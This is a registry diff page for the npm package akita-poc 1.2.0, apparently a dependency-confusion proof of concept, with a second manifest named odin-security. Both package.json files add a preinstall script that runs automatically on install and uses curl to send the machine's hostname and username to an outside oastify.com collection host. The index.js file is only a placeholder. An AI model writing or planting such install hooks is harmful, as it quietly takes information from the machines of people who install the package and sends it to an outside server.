akita-poc 1.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of akita-poc might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ // index.js
2
+ console.log("odin package");
3
+
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "akita-poc",
3
+ "version": "1.2.0",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl --data-urlencode info=$(hostname && whoami) http://479pa367cl3elrpuciye4inib9h65wtl.oastify.com"
9
+ },
10
+ "author": "Akita",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "account": "^1.0.0"
14
+ }
15
+ }
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "odin-security",
3
+ "version": "8.8.88",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl “info=$(hostname && whoami)” http://r6yc9q5ub821keohb5x135m5awgq4gs5.oastify.com"
9
+ },
10
+ "author": "Akita",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "account": "^1.0.0"
14
+ }
15
+ }